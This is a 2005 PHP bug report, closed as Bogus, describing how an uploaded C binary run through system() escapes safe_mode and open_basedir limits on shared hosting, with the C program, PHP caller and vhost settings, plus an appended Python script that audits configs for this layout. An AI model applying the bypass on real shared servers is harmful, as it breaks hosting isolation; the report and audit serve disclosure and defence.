 ID:               32421
 User updated by:  ricardi at gmail dot com
 Reported By:      ricardi at gmail dot com
 Status:           Bogus
 Bug Type:         Program Execution
 Operating System: *nix (Tested on Linux)
 PHP Version:      4.3.10
 New Comment:

The PHP engine can't control the children created by the exec functions?
This could be a great security enhancement, since some PHP applications are suffering from exploits that use this technique. I've already disabled these functions now, but our clients are unhappy with these limitations.


Previous Comments:
------------------------------------------------------------------------

[2005-03-23 08:23:53] [EMAIL PROTECTED]

Disable system() and other exec functions then.
PHP is unable to prevent you from shooting yourself in the leg or formatting the hard drive with a binary called by a binary.

------------------------------------------------------------------------

[2005-03-23 01:10:23] ricardi at gmail dot com

Description:
------------
We bypass the safe_mode restrictions using a binary with the "system" function built in.

The problem occurred when we had an incident on a mass virtualhost machine. One of the domains executed a script that bypasses the safe_mode restrictions like open_basedir and safe_mode_exec_dir.

The configuration in the virtualhost was like:

<VirtualHost *>
    ServerName www.something.com
    ServerPath /mnt/nfs/domains/something.com.br/www
    php_admin_value open_basedir /mnt/nfs/domains/something.com.br/
    php_admin_value upload_tmp_dir /mnt/nfs/domains/something.com.br/
    php_admin_value safe_mode_include_dir /mnt/nfs/domains/something.com.br/
    php_admin_value safe_mode_exec_dir /mnt/nfs/domains/something.com.br/
    ...
</VirtualHost>

We create a simple program in "C" that creates a file outside the open_basedir and executes a binary that isn't in the safe_mode_exec_dir:

/* --------------- Contents of file.c ---------------- */
#include <stdio.h>
#include <stdlib.h>   /* declares system() */

int main()
{
    /* Runs through /bin/sh as a child of this binary, not of PHP */
    system("find / -maxdepth 1 > /tmp/trash.txt");
    return 0;
}

Compiling:

gcc -o file file.c

With FTP access, we put the file in the safe_mode_exec_dir:

> ls -la mnt/nfs/domains/something.com.br/
-rwxr-xr-x  1 nfsnobod nfsnobod 13576 Mar 22 16:57 file

Now create a PHP script that calls the binary.

<?php
system("file");
?>

Then put this on the webroot and after accessing the script with http://www.something.com.br/script.php, check the /tmp:

> ls -la /tmp
-rw-r--r--  1 nfsnobody nfsnobody 139 Mar 22 21:00 trash.txt

We had to disable the execution feature from our product.

------------------------------------------------------------------------

-- 
Edit this bug report at http://bugs.php.net/?id=32421&edit=1
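
Added example (not part of the original report and not PHP project code): a Python check over Apache vhost text that flags any virtualhost whose safe_mode_exec_dir equals or sits below its open_basedir or upload_tmp_dir, the layout that let the uploaded binary in this report be run. It assumes those two directories are the ones a customer can write to; the second vhost and /usr/local/php-bin are constructed sample values.

```python
import posixpath
import re

# Constructed sample modelled on the report's virtualhost; the second vhost and
# /usr/local/php-bin are made-up values showing a separated exec directory.
SAMPLE_CONF = """\
<VirtualHost *>
    ServerName www.something.com
    php_admin_value open_basedir /mnt/nfs/domains/something.com.br/
    php_admin_value upload_tmp_dir /mnt/nfs/domains/something.com.br/
    php_admin_value safe_mode_exec_dir /mnt/nfs/domains/something.com.br/
</VirtualHost>
<VirtualHost *>
    ServerName www.example.org
    php_admin_value open_basedir /mnt/nfs/domains/example.org/
    php_admin_value safe_mode_exec_dir /usr/local/php-bin/
</VirtualHost>
"""

VHOST_RE = re.compile(r"<VirtualHost[^>]*>(.*?)</VirtualHost>", re.S | re.I)
WRITABLE_KEYS = ("open_basedir", "upload_tmp_dir")  # assumed customer-writable


def is_within(path, parent):
    """True if path equals parent or is located below it (purely lexical)."""
    path, parent = posixpath.normpath(path), posixpath.normpath(parent)
    return path == parent or path.startswith(parent.rstrip("/") + "/")


def audit(conf_text):
    """Return (server_name, exec_dir, overlapping_directive) for risky vhosts."""
    findings = []
    for body in VHOST_RE.findall(conf_text):
        name = re.search(r"^\s*ServerName\s+(\S+)", body, re.M | re.I)
        php = dict(re.findall(r"^\s*php_admin_value\s+(\S+)\s+(\S+)", body, re.M | re.I))
        exec_dir = php.get("safe_mode_exec_dir")
        if not exec_dir:
            continue
        for key in WRITABLE_KEYS:
            # open_basedir may hold several colon-separated paths
            for root in php.get(key, "").split(":"):
                if root and is_within(exec_dir, root):
                    findings.append((name.group(1) if name else "?", exec_dir, key))
    return findings


if __name__ == "__main__":
    for server, exec_dir, key in audit(SAMPLE_CONF):
        print(f"{server}: safe_mode_exec_dir {exec_dir} is inside {key}")
```

The comparison is lexical only, so symlinks and NFS mounts that alias a customer directory are not detected.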